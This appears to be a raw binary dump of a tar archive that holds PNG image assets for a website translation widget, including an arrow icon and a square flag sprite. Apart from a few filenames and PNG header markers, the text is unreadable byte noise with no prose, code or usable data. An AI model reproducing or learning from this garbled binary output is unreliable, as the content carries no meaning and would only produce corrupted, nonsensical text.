��=Lp��H=4�;`�r�iL��i���.��R	�-�v��[��(��Ҳd�׌,½թ4�*NB�l�h�9x����S,�M6F���16!�i(��̈́{��Q�)���QC%�-IH�'�?���}��ի���,�22�&J��e����'R����G���~�����o�A+��*�
np���L�+��Ho�)K�5�BJ��k����!�^ng�?oF��p^�j�\�v����4pG��J?|���RJ>p����G~O���7�6q�y�IL����&n=)����2&����y�*��1~{�=�FܝP�
���pwUm,� ����׷�!��;q7巡�~�p SQ4��I DZns�����)��s���v��[�����k�����(M���o}��}���y�'�;�i�M�O�@G���GK�~��2%}�v:��Eܠ�������`�^�L֩6��U��k����+��{�{lL�����d2N_��q"���_�ۘI0�����|�l4�wnQ	:G�a�"+�aM`�0��}��/��})�/�?�;lH��J��Km�~C �M�>[�,OÝؚ+��$��Jg2Y�O�pU���܄�@I��&�v�q7�ܒ�8`�uRx�'��&����#�Q��̂���I$�ub�����<A��܏-�?���ñ�v����s�q�up�����vS���j�z���I�'Bt��	�y#�9��f77��h��ѭ�*'W���-�n�np���枦��3�nk7�ؗѵ�ir��;�V�SYll�̜�Iރc#�tړ�V&y/���m��nj����=��M��U�7oE^�V��P�n�ܹc ��l#��Z���2p�
R� �M��%��+�_�~{��i%�x�׶�=�z�}6�uI7�t����>྾{��\��<�w�޺{�m?Xw��z�a�3�8�p��p���s���l=,;zh�8z).V|YW1�B�y�ڙe4�������k�YHoX��nu��U�Ul�^���
��_�#n�p�x���l~��/�,�f���htTl�&h��ˎ ��c\?�����c�xњ�RVPSS�R�
jʹ�y
�(��v�59��[�Tb9o����ts>�}�p�V��1=5]F����ee�eBVj�d-����b%���4]W�~9��T=�zZ��&��b�O>�8'7AXG���_��>��`�&�m�Ǽp��W�s>h�;^@sK�+���gp�-�Bo:�Y2����.�_p��$�.�t�� �F7��]�ڒ��O�H9�޶ns9�����`�;�:�xD1쯑Å�J��Ԕp�ZS�г��Ҙ�
���8:si-���L^�Ӗ��}Uw!<H�ml>���0̨|�bܖ�EZ�,Y��@��V�63��B$��'��-����i
F�Q�vwLZ��K�z�B�u��/6���������&p��#�E���|��	�@�@{��)4�
���%K��J�v���2'���n[¸��1}A��JC�U}���w���_w3\
�	eM~mM0L��,��Ȓ��Y���/-�ٳ�4�p1��u{!�1n}�9���ENݏ�ta<,Iv��Q�	{����vf��ҍ�M�Em���ޭ>�b�)��I�$%:Z���n�ʟ��e�s���~������/RbK�b�-�	p/�Щ,��7lCy>m�-�����l��up
�.��$����N�[D��}M����i�H�Q���U��U�d7��
,
~�+��~YD�"~���8t����˄íŏ��=	������[��#�7zs��r0����m+z���/O��v�7J�iI	�)�cb�j���V��H�����~�YV]έC�[��TC�2��9�>e�:r}�9d<7�z�A�s�Ӓ�s-?�Ͷ���V[[�{�ڢ� ����wx�{��*��tZ@�
g��}6�m���"�N�.>)W�䯟�l�0�1�7b�6[w6�D�c܋*�x{��a�TIVnk�����=��us��m��P~�S���?rpɌ��qK�����C��
��F�H����`4D
�$�)H&+X�.la�U�5C�ۉb�n��יhO��Sќ�;�h�p�(�鿲��Q�l}Pf���¸�
D�c���v���u��������(MTT������������	Jp_"�	��ѕ�����*p�@�����r�F�&��|wmW/�f�_q�ZQ����1������-��k9n��7޾�=��kw�0n�e�ŵk���9j�s�7q�����]�����~��]S��s��Z;'�����?u�Z����r܃�/Za��v���!�[���  ��naܒ)�I[��a49	�����6'���p�IO'?}�Ȟm�v��/�To�����|����[��޵���N�{���/��w����u�N��~D��>9�pӼ��>�r�p[!w��O�C���ϴ<y���2#��Gp�mndE�>�E5Y~y�}�� �U/�d0���?Ȱm�S�(�q���=E$d��)��QLK�b[7���F�t���3�M�T�g�U2Z�pc˽�H��7zqT:͍�<�����
�aɿ}����^�4���]�K=���됬�,��p�3a#�,��0�Ƹ��yaÏ����*�{��Ikɖw�Z0�	f����u���=��T�>.����W�̅q�}�]�Mo�c�=��-������緞��X��3��{"T�ݲ}{@KKO[FO�˪�,N;�58���3N7�=yҖ��I�mk>�B>�	��;Pd%`$)�T��`&�tX�Ft��{���[ߘ1�-ϳ-�&o�ayyy6�fنY>�,3	����N�a��.�ƽ��n��2Ӏ��&��=}��%�y��g�]�ep�O�}SF�Y��#U���=�qw8faN�_;�������t�p7~��3���g�52���@̂{���C*���s�֟)p~h\��m_8�P]��p;���(X�Aֶ5[G]ap�󐐎�!;�#7�uYcT� n��嫖���W�70�wb\L�N��j�G���mz�S�]�����j��������܀[�8���x#��΋8�w�W�0"q5B�9��x�c�M��Qè�d0�:zU�����Q?%���rʒ��(
�hWx+x;��m�+И,p5�V�
�T�35��[�}=J��|,E����KJ�J�R"��)Y}���Ik��1�9�L��0��H��%+�Tx�I��:��X�YL�e�6\j�!�{<��_�f^���}ַ9�So��s����	��:���,�����N���FIY����3����k{������ˮ�=�|p��h��W�g��+p���&�v��L�`�9>0��g}	w|��pz��|�{�nsp���?divg�Y~��L���G�������FO�Zv�"�	R��E	
�O���Ȯ D��T��/4�� ���IV�}�`�|�B?W)kl[�ьS��4���}��[��i�劎޸�s��N_j���Re�1s�뀛��o�l��4c������	��S���X�B�F�y��t�1�0P��|���̀[�2��ë��a7&��U߽�^���nG.s�w��3�
�[�&T�2��07�Wn��v��"��D)�q���&��ڿ%놢��VU�����,�f��o��9㷝w�2�h(�M�òe--����2��	�tXd)��w��u��Ưn�y�R��g7l���.��S��n�G��5��ο�����h �%i�/�'�?u�1�����?�F߳aZ�l}�pGDx:��|)Ӱ��9!)7��]�^�]i��4T�N=W��%n �V �cʺl��x���4h�1lO�w����ߘe�}���m�ZӶm�bZ��[OKj#��^���B)LK�����R%�ݺ�"(�a��(J]�
7b��m6���_M?���a�pW�/���e	��73�ǷX���@�
�ҷ��c�3_䔰��Vo�qp瀆;�>�c(�}}"n�
����
-f5H
��]6��OӔhJ�4���`�
ǟ�9�q�m!��2��+�kѕ���`l_��plޭD
T�t��2��o5�CӃ?�11��)�,Sz�DE�tz��n�l��`�P��9�{�����~;��U�Lp5�[�C���֍�t�H�A���S]jo�n���z���9ER�@�T�wp{�|�8Jk���k*�rn�p��󞫏�ho�X�u�qOϘ�S>�N��?Y㷭\������U��of܄��������;n��wъs��nv��[Z�.}���K��.f��;mR�$�[Y�u~��_w�U:%6�f}�_�9����]�[L�ߦ�p�Q��q�ܾ}��ۋo/v�>�� a�C���w���)����b�I�z&� mA˶����*:�䋜�/���vs-ni)V,[�Y�P,+(pӮ-�܅!~���>�%)���۰f���8��o�)ǂetH�p�|�D�v�:r�Hh^�	��n�b��E��$�#���E����$���NC4I%Lb(�]��2�����*'�K<��P,U�q����_.�ľ>,����2�F���fa���h���œ/3��Θ��AoT�m�'�^��O�@p?z�|h�ݛ��u�
p��Y������}q����,}R��Y#Vך���5��51?��l�?����ҁB^rc��N�f�P$k�Y��f���\�[��{>
�8+<�VDP�Na�<F{�j���=q_ȿa���zmm���6��׻�=}�ty�n�EU_���/�w��{��i")늺�P�����D�ܸ�pS��~݃�$����pzF^��&~�O'�����]���D%~��x�0䰇p;�N��pw�Y���q�{�z��C�n���po���	p�ڼ|ժ++^�Z�y��
Mw��n�/�S��1�y
��;���IlU%ǟҶ'"���N	�P){�y��rE�ݎ�q�>
���y��K#⋬u
p7����*���pLF3ٮ*ܡ�R�i����i����i��������ꓹD����"-y��;�Sڷ0뮒�Q�䎬j��p�����m��@L�%�66�� <
�c�J�e,�D���b���d�V��"��θ���뀻��ȣ�逛�o�	�[�[���i�FN�dڟY��<�Ng�ʋH�;ޜ7A���S���[�#�vwٕ����?�u�V�����pz<F6��7 u�m�K���/-�,�=�9��t{"&�!&p�j��ʻ`8]��|U��{]a-���2BP��UN*�S�]n�B[ �y�,�p�����)�(O�q'�s~?��_�?��3=������W6�t��cD��{��y���eˎ�y������"��/�
�t~�;H���	ى{��6~q���3O�0��E�%�	Q0i�_.��#�GMڬ;IZ����g�O��v�_|�۠�ȣ%�h�p��o�?��ߦ�E%~���j��&����e�z��~��o��{���v�"��^V���i�bپ}-
�
�-���7�yӎ�ޏ\� �������=�Qv�3�ܘ������.���\T���8�f��"Qrk�	��|�C�#S�e=Y�
B��$G��G("�<
��;��|;�-|��c��ٓ�+F����}4��x�}:>���Jg^r*n�Nk�{�_�Ѳ*�P�U��J�ujA�`��˝�V��…#"�<����h���gg��#02	t �˹��[w���9���Peh�Mp3��EÛ++�M�Rn(��0�V�o��[����N��m��6�/Ҋc��\w�ik�9��.�ׁ�
�
��h����g��W�C����\5.?��4�4�Я<��i�U��Fp��K��2��p�߅��azn{&o/�$p��oێ�~��ShW$P�Cg�?��?�gp�񣭚C2n�Ǥ���+��L��e��M�䅺߷o�9��p��#���u�_!6����t�K�Q7C��g�-��
N*0��p�߶n]���q�ם��܄�x��A�\�;a<��?�o���aJo��k��� ��W�h�~��l�;�'��}	|���Ki��D�ff���
"�����,����i�I���娀�,�_��ɭT��:n�mK���!�<�v��s�;����#�>����Xzp;�p��n��%?��Qc�2�߈�ELIq�kw__wj^Y�P��>���ǝ�B���ХX��A�%)��-��k�bM��";_�"�9o{�
|m)he&w����%/)(G�_�>�(LK.�?)	�o
pgb��Bi0�D�+��� ����\�>����o��&�V�M$�|Cwb���VN��LF����]U�����z��ȣ���{�N��<������{���5�A�81��;�p��@���#�&�c�a�GRv��%�T�p������ϙ'�G�F�4|�)�{p�y�V��n�[�5lW �y������:�&TC��ZsKA_ۯ2�[�-���;\�v}�n�h۸Q�|�xp_�#��d���/��.޻�	�N�F��F��vp#�o#�wC���8��i�rv��M����O�����`g�Y���,�����oj6pnpcY�R�W�Z[��^&� ��H�E�Q�_br�e$�|7��JKtI"Wf�|��q�����R�y�g�fp��[V�p;�q{�9�۾6�cc �V{������ik��8�7LU	���[I�{��7��]��<�m!Gp���&�E'�&�L��>�� n���Y����'yp�-���fQ-�v�Z�|;��U�`2�޶�]�����]n���ǿ?�0*���>�1����Ktp�+��xpKA��?�.��l�� �7��n�2�t���E�G|��ɀ[�y��G-��߹��mٲ��Gq�e��(��Qa�Y^�̀;��'d"�%%���A�ZM�^�����Qƕ1���1e>�۝�}����zp��ھ
����HN0�Xw���E�|9Q�}�_�~q���}��,�[���F���T��z��<�ʑ�����e�Ա?�7~�a��o�NR�H,eƸ�b<���v���'P�xb�*Q�6�5f���m��d�[g�6#�^?�S���pîMy���&�S\|s�7I�\���F����M�(����������އ�<t�۳��Oh�,X��A��G�ف��v|.Zw�\� 5³�[
�#��o���>]�,�7ˠ�$�@�2�xYR���R�*}=��?"P�׹�Sx
\F������El��[oC��Vp�ߝ7,E�P���8��\�;�H��2��7h+�o�����oo._T	�~��g��̬�5��D��Y7�!�g̹��F�6�-�MNv�Mz�[���En�hX�$���
���[��3�*Nԧ��ˣ/��qn�6z��;A	p�!�6R�6���e�:^��u�W�A��_FE���&z$��o���̴
'@��	E���|�|�(��{�U
p���%eK9��<�+2�	u6Q
��G��7�^��]���i�mG�
����q@O��;����+�������dԶp�Z5|��f�p3�ֺ�&�?Z�<I��n3�ށ	�١6f����� �{{�bV��n��8]uo�l����S{�M�o�2ܝ�C����kn��K�8l�S�3{���-&�J���A
�Fy
��7ULF-���Ll	�t���w�esm��+(��g��3�H���6���8�%)���2�c�J�X��mL���gpKK5�
}Jl0���̌|7���o
p�<���"PXp��vv�8������귱�(�5�e�E�TX��U/9_fp�%n\���*��ۿ��J�ϟ��ߛ�r`��~��{ц�m�R�4Y(3�Ϳ�����$���)1D����)�
S`�!�NZQ�Դ�L�5�)�㩎�[-�{��W��7(CCCw�	�?�xίy��
�E�g���a��`m� <�kgp�T	=�
�=@%p�?�0?އ��-�{/J��[�-.��٫�nZE��v�t�脐��EEC��Uw�͜�/��e703�k��~Ӕ�	Bo��߃�l�fS�EV�+qw	A�5�5�T��%)i��7��4�|��Y��SD�%�5���+�E��7�����6�]qg��*����.�)�/5����K4��1Q����D��3>.�h}r=y$�����3��0K�@��_w�2��l���(�,���D���h�]�Z��ܖڇ�nųf�N��8���'m��n�=��k6�\z��7��m�������5-��?A��$!*�//������ţ��;�у�k�_��?>��1�}�ŧ�̒%9��K�n���9
�˟�}t�(^��?�{����w�\�����{�ؖ�؀YD3^��8���Av��
��J鋋++[c���J	�@����w�"P�w���E˖q�J2�% �(��B4��&�i<)Ւ�Y�"�h�Ν;\i<��n�����OF�l�[$���p��[�9Xk}�烥A���*��Շ��B�6�Mb��H?qz"��<E�^��o'0t��G����D��i�m�����.R���f�`��H�v�>�g��\q�B�6�Y��{����	��=�_���a\HVk����{�ܿ�|�?6�7��އ7��I�����33�F������j)Z�n�\�a���#�V��o�%�B����l�s�S�;�.=0��aviz9J����}�j�,�m�z�h��|z�o�=޴Ρ8>��`�os՟K�KiMn�]�rx��a��������0~���m�۝��
ֈ�t�n�-֜rY�ˀ[V"g�sc��ʩl)����
�uA(�A����)�G�UҸn�hw��
��D�KR���=��
2�
��9�HT]�4�����2����ㇶJ!�̧qnK�.�;��χ��4���!�|�&4��{5�90��y�Vp�W���١�f����{�~pn��k�!E�D\�����w=������M���#��v�k�v;�m���p�#�oJ_�>^8�u
��NL�̥�1C�_]���W�9���S���>V#4�^��[<�n�m�n�����������ܴby�
��H!�H/����݆������>�H=Yfqg�+ع�+(�3M]�i��o��ӶQ��$�<�f�6w D�� o���
sp��hér
g��m)����p��p}CИ���p#���;��P���ӽ�g��7p��w��n�up��32�K��}�
�ٗ�/<��`��%�v��Y�Ҧn��NL�
X2��ax'3<<E�����%�z�N�vܙ�ΰ������ɿu�-S�:��vȤ�=�<�U��
�U�����n�}|��.F?_��wx�z2��Z���op���mw7b\��@Eᦃc�%��x�m�pW9|����+�������Ԁ���|c�]��McFs&��/�K��h	����E�PC-{��n�T1I"�&G���g"fa:f˃k

:�'�3ԗ�p'�ɓ
��7҉�̕1�_��+\�w{�Ԩ�05-�*���ʮ
}�J�g�j�Șh���9>�
��'��IdC��N�f�fg�$�v8ң��.�]���+�6!ZH�M+܀;�����@On*�
372����G7�p���wq2*~�M^��Yc�y	�9W���k\?��%��	Q`�h
�ov����~�ス���53��Ű�y��#(�%�7J�����]������ȋ���p_���r��7	�ͩi�y��it�-,�6��=K�!�OmcyNh\T)#��P���S���#�.a؍3
�]/��a}�6l�Hy>+��`߷{v�U����s�.t�ulhh3��\��|,{U�RęQ)�Q�	؀�!Z�!g���:�A��"���_��M�U*uZ�z%W�6�&o��5-�bܢS�������Y���}��n�m9LR��"E��̀{�'�3x�
"�xc�4'�7~���)�_�����4(7]�/U�nQ��<�ni��o���m)_�*0��
PN*�-��Wzn%o��[IT�r]n�
\�m��hC������?�~ů�=�w�?Yz�7��U���Z�����������Wnn�1�����/_��۵�w'Y�P1�{��5���Tpp�Z+K�ЖF.��v@C�.i�m<���h�&0�׽qcw*c�LnYB��p�Y��v��^���kw�TJ�͜�9��+d��;�qfa���}���>�۷��H n��:t� u�Ή[��R�]��[�c1x�-�Sxw�L��1A�������^i��'߶܀p?�o�7F|!�2
p��f>���A�ҥ�����JL	V�����V�-�3K�6-���b��T�WU��\�[�C�^�������F��}�0��|���=��O˽�Cy�6J���(��?y�]����ܗ-�R�ID��܅���,�U�M�h�K��3����Y������ò-~�m��~{��Š�CC���;�w/|Swb�ܭ�Q��S� 3��yBO��{��$� ��wP�v���M��n7����qp�:-6[A�p�
%�2\~�����cB9�<�]L<����,�1��ŵ�Ӡt���=����8�~p�"�^{��n1f�����T��mW��h"N\�%��@82�m!��X����w����L>}h(�q�F���������-7�8dg�n����[R��)����񘀛�0�w�o�3o�٘� ��-�H!D�cV���4q!@!�x������edKOk2^��D������D�>	��}��{CwB�+�`uV����)�
����]y�q�M��i���R�.���-Z�4���	�}�os#��&�W
�"w�|<��;���71��?!+F�r}�e�-O�����H�gp����/Yr���"�F�ߞۀ�矽t�׎�����i��ƽ��U�����7�΢R2��C��/Kh��Z?�]����K�
[ƚ�]��^��r�xpG�$@d�?΀;�GA<���Yfp����^O�j�^�[�����Y��ؐ�{5(�C�c��;m�e��m�*܏x=IH����J��O�-~��	�n�[�ڋYp�mؗ�����nv��w�[��&�E7��2C�ۍ�m�_�w�0G�mD^7��T�W��)O���ӾFI�f��e�'y>
E�qO���,�	ߦ"Y�P��j��:��
�>��no'���+��I�͖�mU���X��<��:���[��-���~�H�?�W.�~mn��؂�;�쟀
�iӚ�����*�ѧs�3n�E�Ι�t3&��4�&'F��q��L{�l�7�-��¹�k����!�ǏO��q+����:X7�q��z��+w�.n��[֭۷�i	��m�q8�R�^�d��?`�k�,|��·7 ���}�.��1���X���g�p�|��p�iw����O�Y��*�R�k-e(��B���G���Ⱦh�pp/�Μ�|��:,!�[Ne0�T:��h4u&�n�nF�a�h��lC��񙓱�b.8s�*���"j�.�2�
)xpWa�m�nZ�OtT'�J�܌�y�-,��m�S\��S�7/�k���1��n�z:��ݡzc7h=V�w���M�>zY�=�Q
�e �_�dܖn*�[�=��-�/�g_5��?��n�%&��g��܏�<_�#�"�3��=9���o��t{م�z��+����a��,��1���`	���<S����y��\���	��
7�-�ƍi5��E"������=�3��J���Y<}<U���#Kc��UT�v��`��.d}����s�D��sN�V��'���l���S��Ҡ7p�xf��[�pqYճ�q��ۀ[���X�<�dy��������gp���e$��p�R�:6�L]<ϻy��Ӳ��.����!k���ǧR�����&0o`ɒ�yp#�o�i���{���;����K8�SȨԙh���{��FGPR��rX�@Y�+@a�w�����Lt����E�bA�C�]�]Uv���#w����-�p{w��뭽|�rm�؝����r���q�u����'����-��Y�kQ¹�W�����[�<��쀛�P�[!:��qJ�pp��R1����Ѣ9R�1�}���n�u���{�'O���n*����V���`��?N�
߶����P�٥�udύt}` C��,ͦ�zi`n~�J��sחD�<�Mo{�o�nk�����S"�G�È�8l3�-��n\������N�W����,p/Z�t�����6���p���I�^��p��w�?��x��~cȥ2�������2/u�[���-�SV���7[Y�	�-2�yx�*6��j�p��y��n��8~�]4����0��7�;����Y����*vޘ,p'p�o�N�'%���y��%����bڟG�ڗ�7p���?��n.����7o7������U�!�m{]�&/��G�����D��"�n�������o����3�I��[��Cv�7A���]�G�mD�
.��}�})��p�R�Fsܶ��Ȥy�='7�����v�]�<�������[0���޿�cד���7	����]��Q��,�qp��]�nWw/cH7�o��n�3\�����[�5����'CBN2oϹv<�A��Z4]h��Rx�d�PxE�����{���)oF�ٹ�{�]�=�	��l�Qt���8�������D�N��������C�|Z<���}�t#�m��Ur�UWp��055Ͻ������� �ln�&�k���	��O˙%Kr �\����spύ���c�<��H��02�|Zu���[�mjT�s���ӧ�w��^���e��k��H���`�o	"�d�!�
U��`�v�<�A@�M"��ccc�c�2r��y!�o�#�����������#|�\�؆�
�y�]�dG����^E�M����3��d�V��Yw� vB'[y[7�%�'/""�c�{��Y�j�l�9�Q��g�6�6�o�?U	�y����p��.nk����U4p������aB�+�v�>�2�A��hÁ�	�͕�-�^>��ۥ�����~�|�;�oSe��#����W���	ai�a����������k̈́�%(���h,Ќ(���[�}�l�7{��Z6��ŋ���C��ϩ�x��T7�K!C�o͉�
܆�#�
�Z��1�/�;O���������n����y�=�w4fW�a^߼D8��o����3���y����{���܅ �\��d[)�	p[B��@��<����.��8�(op����������A��M�l�D���*��=���ƈ�v	p��eaT�nWw�P�^Կ�)�
ao0���P{p�oO����Aƪz����Y<��D(f�>)�~�����Er��:s�)��O�f\A�����q�k�s\�=��ۅ���W��)����>
���K���H����%�n~P+�n^��F}����=��z�M֝�52�QC=SP�ta���'g&&�_���bA�B��pg�D���;ʺ��E��#p�D
�A�r�e��}=~��_��۠h�d�YZ�~��pH�o#��,R��a����*�&�Ivp�|o��܉߆��A��/B�y�M���%p>{�s�z�������z��~{&���QVJ��v�
��p��-��n�	���|]z(��[����	�D��ӷp{.~�3�ۭ2[���~5K���`��m�+e�m���L���P���x�!~�.�[�}�ݹ
��%Y��P!������C����z1���'O�{�[�wޅps� ���<�yM~�6:����3���!�؈�>����fg�x����6n<�=Ӏ[�ٙ܉irA���p����([�63�6�p����7�n��ð���h?j�8���<���,�4��+�5��$��ܘqYX���������L���e�t��ۛo<�nL������x���e3Z��+o;��Jt�)*���$�ፖ���]o;\�
��C9�����8�33�9���F�B�%K�b��7N��<�~�7|�1(g"��-(����^�>?���b�1���o0�<x������
�N�6L�NӔ�Ec$p?���
�>R;�Cql�n��mx>5F`���&JNV(��E�n��q�=��A�����<�p�T����ϴjn�9�q�6�6�oS�(���gi<!��vp�N򿐓*�7y��)Q��RQm�%jb���	Y§o1�d��<��-o<��, ~ۑo3n@�ۯ�n����
�w������!���w����M���]��{���^M�wo:�֞?���"����n�2}ǥ�md�۵hnIB>��1G������<z}�����0��̡���?1�66�
���2�-�|������Z�6�6�pg�	����@������+��up���8�޿��@pp�.�Ɖ�vp��Y«=䴫C�
9DS�;'��?.���ܸ�sps����W�DoPi��l}rp���a���op��~R<�;��ˣ�+�rI����_����X�ȣ�+~{p���["��Q��(��p�ޯ��� cn��i���
V�6(�Id�D�z?}��}���(N����)~ۅ�
��+r�	��sl�+����n���n��Y�ԣ�g�n<��q�͕��#d7R�6B�9TG�����[P^ɖtWw8ڄ@�f�@P���|Ҽm�;+�+����ߞܳ��v`�*O�#�N|�
p�݌�m!���m0>�ĥIEND�B`�weglot-widget/build/images/wgarrowdown.517eb92e.png000064400000000244151330373270016126 0ustar00�PNG


IHDR&ӥ�kIDATx�c`�X��@̆C^��q6I �	�]@̄E>	��q66͌@l��x*3#��Aœ	9_�?�|��@��È��?�@�	��H
@
 �Į��0��h��IEND�B`�weglot-widget/build/images/square_flag.32ea47ac.png000064400000174121151330373270016113 0ustar00�PNG


IHDR*`0��X��PLTEGpLE�q�2o�K�\@7:=�L:da��K=}Yp��@5n�J��K�VhX+&&&S�ҥnGޥ2�1jt��lA.��H�J���4m�G�Q@���F8�1W�c&&&K��0o��o-�1&�5)�7Q�+Sڲ��	�{�+����܃{&V��J�����܌1ڳ5뵱�_S?u����w�������ޏ��䢛K���H�K9m���la童��9t�~4�������OB�������ʛ������`5����1.)����yp�T5�ݹ@n��XaX������n5ᚔ�WK�1̲BO���2���c����Nv�~{d#�������Y�Zߝ0��ȯ�]Χ/ïR������{��n�����-V��Ř0��Mo��/�7)��ce����ӝѦp."�F���NJ(e�J�?4��>0����܊�����p�ڡ�G���:z:c�f�—�k$���C5{7/x�PH*&Nu�������d[�OP@:$�ol�pGi�@�輻�H�م��jbQIw��ǁ2�z)��\~���F��-�+�2A�K`����G�kE֗�SŲ{���ڙT�ͱbe_Y/*D�M�Iusq��Pe����݆�p�ZaP'��
FFG�s^ο��[R��N�Ġm9Tv�r	�<-�����~[��Ů��t���"X0�����
&	�s}��st��׼(�#��>���r�x'�ė�V�ܳ�
����+z,%tRNS���������޳���t���x=����'IDATx��݋[SY�(��3��w��;��<�ߎ$�U3�����$��(	��$@�wP [T
�f� �(�P�U��jK��}l{���z�O����Y{�\�������܀�}Y{�w�ֻ�J��+x���p����/���:+��EY�Y`?��$b��!=�q�.d�iMv4x*�����?��/?�?�o�;�s]�Z������?��#�%�N��I��2�N,��4�nY�<Z&Q�Y�?O_�{|��W(�?�Z�[d��O�踗Oh���w��(�9W`����>�%�x�{b��k}&A�B����W�Em/�dd�]?\���(��B�l�W�G���U�L)��
Y����`�O����5`�L��Z����B��= v?�u��~�������p��Y�l8/�
[��#d��Y���Cn_����;
�~�����c���0K{���)W���Њ?�;$
{&
�r�	t�m������ޟ<"���x���w����g�)������%L�]����2��V�j_�A+��I��N{~���^�ۆ[Y^���zؾO��'l���Pv��j����
��'��@ݚ�,	1�� ���@����e6�������3�)��O��@�"ޤ����*������a�T�^��ϛ�E.ψc�^f3˓q�_�_@��y�0���
�
\�&v?��/�ӊ$�XW?I��0��R���l�z+�����}S�������hSĮ�-3�-����_A�@�T{��Nj�jqZ[�N/�
�����6��c~�~�/�nZ�/������,���	��
�a���>���l:��f3���ߟ����t��zx��Y�Ӝ�����_�{I�ϛ�G�(�=T�"��lusl�S�TQ�4_��;U���q��(n1��@���S��x(�jڧ�D̘���﶐�J�>�]�'��o|F���(�;d|��I�[�ڇ�h��w'���\�����O��KP>��w�%E�w;�������U���&�Sʒe�BP�����-G�y@��~�R�cG��`*gSv`����']�42��{K?4�	����
�z"�
��H�HՃy��i�b#S5c�4��@�U���t����4�4	�pIz݀)l}�ހ��Ը#[z`�lvO��TP`
�2�/��T)B����ϫ'6��4����GLE
ӚÊ0
X1R!�E���}9�X����-��n�A��@��Rӧ��2��)�T�	0��c��}$G��7`��z�%rүH������>��K_����6�g���kL��l�
�$����
ӳ���!`*q�&��7~��S��/���WC
ӈ�>��LES̗��)�/�>^b��S�0]���
0M
00�%���>~G���+La�CE�
����?�ކ\�TɁ�<M/�P��gS��G8@�z�28a�?��a�����Q$�k��i��ٗb�t�`#��C}��S���oL�0�n�ö?!��T��	L�n�([}�a��Z�;����
Cŷ����d�`Efe�[�L��݆��)ҵ��0��1eS|�~�5
{���S�0e�n_�A��I�/�2�3�E����f=�xw��p�V�SefVNNNVu6*
0�|��uL�����HX�p:D]t�SXazr�S�j��FG��^?�����8~����KA��z�4aZ�^��,��uLB�T*`�ܠv:_`��������B0��L!��/�T�0��+B�4p��j�Tz�G�����	������4�Զ���,&�{���aFWL"ySd`ڮ.����>3�����NQ!`Jd�N��760��?ʡR���7<0���B
�@S���ta�og��f<Ⱦ4#���S�-L%��p���|�N�F@
S��ILE
Sܗ*C��חB/�H�bU�b4�`^h`
GL�0}�N�
S�P��Y~����}_�|�'ׇIL�婸0���b����	S���`*J��F�ܯ���b�__Il���<�����T��8��=	���R-'0��6��L�”��|�/�y�0
80�i<E� �R9
X&��߇����4�v�8�([ó���c����S�0e����7$0���Ȍ�϶��7�%0�Q��)H��׸�
��o�^u`ZU��=iZ�6�]%�ϗ�;�SQ�S��:�k��#��-eh &�B
Ӱ�L�z�!``z����Yx��և�����|��>�*�Ԍ�~��Ȟ����\ɀi���a�6�z��N,���'T�QB�T0-l.t���=�)�0��9-���� �\��_�N��L��B��c�"LV��C����鯵�>�m���n�(1
S��in�J������2B��'�]1I��e�%[p��bNr`�����Q�S���!LC��M�b8��o640��?ʡR��mx`����S�N�N�����h�0��Ӂγ�%�,��s��K�B�TZ`
]��3`���7`ʱ�J��|�WC��Ha�A{`��U�0%|��0�����	����͆����
80�!�>����KC�T��Շ�S��̬juz��Mr`Z�Kզ'k<���Tmv�?l`Z���e0!L��@�<�	
�D��/�/�t�w�G�a����0]o��=�C�
�J�<��4a��n_���{�`2(��K�������T��/��H���0��JQ
�������#X���<�iC��S—!��|i�<F��yВ`z�6&�ZN��[T�sv\�/��A���U�J�K�-0}�w�ډ���)o�5
9��:x_ �[�|�qoR_�M,�����d\k��1���-���7�L����z���B�P��h��La��LA7Y�����c1\�*lg~�U���~ӎ��>��x`z�0�Vb6��$'65*�10�U(�M �X0?��^`Jߌ�,�nќ�p�9�5�P�Գ�V�	&��mɍ<g��B	S���3q�4LRt��=T�?�`�tF<1
S��)����Le��Lk��s]�N�K��|I"��0���>�}�IR`��era���'va��C/���-����(�Ia:&��T}h�������L��i�����޲����S�!L�v��3��?�y��K�@/��L��L�^
8�b_�Rm/_��0�4R�z~p>0�4�R�0u�҈0������˗����ыq����i�S����ܼ�U��wB�T0��}��3�VO�|�l�Q0���W_���~op�?]����x���=��8�T���)��~q�t?��i�8a�y�/��l�&sd}�S��K�!0��?����R-�T�t/$0��M�2��Ǘ~��{?�OL������2�ᨍ?�~�!`�L�[��#�uw�����*��v0`+�l�0eS�/�ހ���K��_z˓:�+1�������A�ՠ�:�&s�4�����p������z�%/0Ň�M�Q܊U��1N_��@��!q��%q���I��L	�Xrj\FL�<&6/@��_��vS�k���ڳ0=T?�iZZ��L!��u	L��o
����A�)+p�Rɩb�7�
L�VF�V:�VV�:��c"�iv6/0��uܖTA�G,%�����&h�YYb֎�l<��o]�)�0u�&����ʇ��D/�l��.��)�0���ӓjE��ԖPƕT�E~?��	S삧�)70=��VB�T�F~Z��md`
�ҽ�M.0��T���D�;[ %0Ջ<`�G<1��}��*LC��?�)���F���G9L
�>���	����*@����ͫLa�i�����^�t�`��fo�cf��0��B�o!`*-�b]�Rm/،rHa)Ly.�&
0'Lݾ4L�})t0��⢡*ڰ�X��K{@���0KL}�����������!`*��ԇ�Sy�j���g_P�:�ف�W�[)=���TV����s�f�4Y�����������7�Sq��&H_I�>-*��k
L�B�tS��O`*��HL��p�_ل)����^��N�p`�٣!h��R��z��M��(�6�~,����DM=G�?B=B%o��{e��#`�aS0%�R������R���=L�,0�x��w{�6���:g�Ɣ-�P<0-P���+��DW���6��\��`�Gy�w���/uu c�D�S��F�+`J�Ҍ�e�2�SS�bh>S>a�ڻ�6�}`C��]Y>w�!�Aaa�JL���u
L�

�a���iN��+�sbI5��l���
���_�3�36��􍎎��GX+]0��9�v��ص��L�Pk�/m��Q�8���S�R�L�퓓��
0���Z�E���F>�L]{M �ix�V�_�B�žN/z���b.=���~����t:r��f����0��	SE�Hb�
L�H���u����E���K`*�dn`z�v�S�r~$����h	0%�M�dS������%���=ɳY�i��*���ݼ��)\�Q��tL�/0
��d`Z�P\´���4���x�&+t�4�3�)]��7��y΢���!`*90���B�TZ�Ŷ���^��ܒC
�HaJ�>�ӈFaa��!`��K����ة�XmUl�T�6@�4��kL�S_��ΆY�svv�an\�zJs�+�ÆȟM`{}q��և�ScXKj�R}�%�i�U��z��sQ �)6�/�.���BS�iXЁ�aJz40#LIo���m]n�Ƈ�)o��0���B�}h�Si�G*`�ϐ�]6aJ�������4�Ԕ#�U��[&H<[ְF�c�� �E ��0�^G���]G~Bb���Hy�"
@�� bk&���ȚS�0�S�/�m8`J������<O��N��^����4]��Q����IN����sC�\}#���q��
